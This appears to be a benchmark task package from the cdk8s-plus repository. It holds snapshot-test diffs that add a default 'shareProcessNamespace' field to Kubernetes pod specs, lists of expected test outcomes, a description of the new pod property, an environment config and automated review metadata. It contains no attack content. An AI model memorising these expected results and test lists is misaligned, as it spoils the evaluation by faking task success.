"terminationGracePeriodSeconds": 30, }, }, @@ -1670,6 +1689,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1765,6 +1785,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1856,6 +1877,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1961,6 +1983,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2047,6 +2070,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2134,6 +2158,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2217,6 +2242,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/pod.test.ts.snap b/test/__snapshots__/pod.test.ts.snap index 137d7e68..3b173625 100644 --- a/test/__snapshots__/pod.test.ts.snap +++ b/test/__snapshots__/pod.test.ts.snap @@ -44,6 +44,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -99,6 +100,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -173,6 +175,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -291,6 +294,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -341,6 +345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -417,6 +422,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -467,6 +473,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -543,6 +550,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -593,6 +601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -721,6 +730,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -771,6 +781,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -847,6 +858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -897,6 +909,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -973,6 +986,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1023,6 +1037,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1127,6 +1142,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1206,6 +1222,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1324,6 +1341,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1431,6 +1449,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1481,6 +1500,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1607,6 +1627,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1659,6 +1680,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1828,6 +1850,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1873,6 +1896,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1923,6 +1947,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2034,6 +2059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2154,6 +2180,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2204,6 +2231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2366,6 +2394,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2478,6 +2507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2582,6 +2612,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2661,6 +2692,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2779,6 +2811,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2896,6 +2929,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2946,6 +2980,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3072,6 +3107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3124,6 +3160,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3293,6 +3330,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3338,6 +3376,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3388,6 +3427,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3499,6 +3539,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3619,6 +3660,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3669,6 +3711,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3831,6 +3874,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3943,6 +3987,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4011,6 +4056,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4061,6 +4107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4155,6 +4202,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4257,6 +4305,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4351,6 +4400,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4440,6 +4490,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4490,6 +4541,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4598,6 +4650,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4760,6 +4813,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4811,6 +4865,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4881,6 +4936,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4950,6 +5006,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5000,6 +5057,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5062,6 +5120,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5112,6 +5171,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5171,6 +5231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5238,6 +5299,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5303,6 +5365,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5353,6 +5416,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5415,6 +5479,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5465,6 +5530,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5524,6 +5590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5591,6 +5658,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5663,6 +5731,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5713,6 +5782,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { diff --git a/test/__snapshots__/service.test.ts.snap b/test/__snapshots__/service.test.ts.snap index 51c9d49f..d27cc7bd 100644 --- a/test/__snapshots__/service.test.ts.snap +++ b/test/__snapshots__/service.test.ts.snap @@ -95,6 +95,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/statefulset.test.ts.snap b/test/__snapshots__/statefulset.test.ts.snap index 86d6f7b3..92e3117c 100644 --- a/test/__snapshots__/statefulset.test.ts.snap +++ b/test/__snapshots__/statefulset.test.ts.snap @@ -76,6 +76,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -197,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, },
[ "default configuration", "custom configuration", "Can be isolated", "StatefulSet gets defaults", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "Instantiation properties are all respected", "can mount container to a pv", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "can select a deployment", "Can be exposed as via ingress", "exposing via a service preserves deployment namespace", "expose captures all container ports", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "can allow to peer across namespaces", "can allow to multiple peers", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "can allow from peer across namespaces", "can allow from multiple peers", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload" ]
[ "defaultChild", "Can mutate metadata", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "mount options", "mount from ctor", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Must be configured with at least one port", "Can provide cluster IP", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "cannot allow to namespaces selected by labels", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "cannot allow from namespaces selected by labels", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Class: AbstractPod(props: AbstractPodProps) Location: src/pod.ts Inputs: `props` – an object conforming to `AbstractPodProps`; the new optional field `shareProcessNamespace?: boolean` (default false). Outputs: Instance property `shareProcessNamespace: boolean` (readonly) reflecting the value passed in `props`. Description: Adds support for the Kubernetes `shareProcessNamespace` pod‑spec flag, allowing containers in the same pod to share a process namespace when set to true. The default is false, preserving existing behavior. Interface: AbstractPodProps Location: src/pod.ts (interface definition) Inputs: Optional field `shareProcessNamespace?: boolean` (default false). Outputs: None (type definition). Description: Extends the pod property bag to accept a `shareProcessNamespace` flag, which is propagated to the pod manifest and enables process‑namespace sharing across containers in the pod.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 11, "pr_author": "chensjlv", "pr_labels": [ "backport-to-k8s-29/main: Backport a PR to the k8s-30 branch", "backport-to-k8s-30/main: Backport a PR to the k8s-30 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a shareProcessNamespace flag to the pod spec, with a link to Kubernetes docs for reference. The provided test snapshots are updated to expect the new field with a default false value, and the golden patch shows the necessary implementation changes, aligning with the stated requirements. No mismatches between tests and the described behavior are observed, and there are no signals of test suite coupling, implicit naming, external dependency issues, ambiguous specs, patch artifacts, or hidden domain knowledge. Therefore the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
510051b4969b3bae1c07befccebc9753cff5fcf0
2025-05-03 06:32:08
cdk8s-team__cdk8s-plus-5681
